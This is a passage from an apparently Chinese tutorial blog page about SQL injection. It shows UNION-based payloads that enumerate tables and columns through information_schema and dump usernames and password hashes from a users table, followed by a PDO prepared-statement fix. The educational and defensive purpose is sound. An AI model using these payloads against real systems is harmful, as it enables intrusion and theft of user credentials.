``` 返回:数据库版本和当前数据库名 4. **提取表名**: ```sql ?id=-1' UNION SELECT 1, group_concat(table_name), 3 FROM information_schema.tables WHERE table_schema=database()-- - ``` 返回:users, products 等表名 5. **提取列名**: ```sql ?id=-1' UNION SELECT 1, group_concat(column_name), 3 FROM information_schema.columns WHERE table_name='users'-- - ``` 返回:id, username, password 等列名 6. **获取凭证**: ```sql ?id=-1' UNION SELECT 1, username, password FROM users-- - ``` 返回:所有用户名和密码的哈希值 #### 修复代码示例: ```php <?php // 使用PDO预处理语句防止SQL注入 $pdo = new PDO('mysql:host=localhost;dbname=test', 'user', 'pass'); $stmt = $pdo-&gt;prepare("SELECT * FROM users WHERE id = :id LIMIT 0,1"); $stmt-&gt;bindParam(':id', $_GET['id'], PDO::PARAM_INT); $stmt-&gt;execute(); $row = $stmt-&gt;fetch(PDO::FETCH_ASSOC); ?&gt; ``` #### 修复说明: 1. **PDO预处理**:使用参数化查询分离SQL逻辑与数据 2. **类型绑定**:`PDO::PARAM_INT`确保输入为整数 3. **错误处理**:禁用错误回显(生产环境应记录日志但不显示) 4. **附加防护**: ```php // 数字型参数强制转换 $id = (int)$_GET['id']; // 设置字符集防止编码漏洞 $pdo-&gt;exec("SET NAMES utf8mb4"); ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值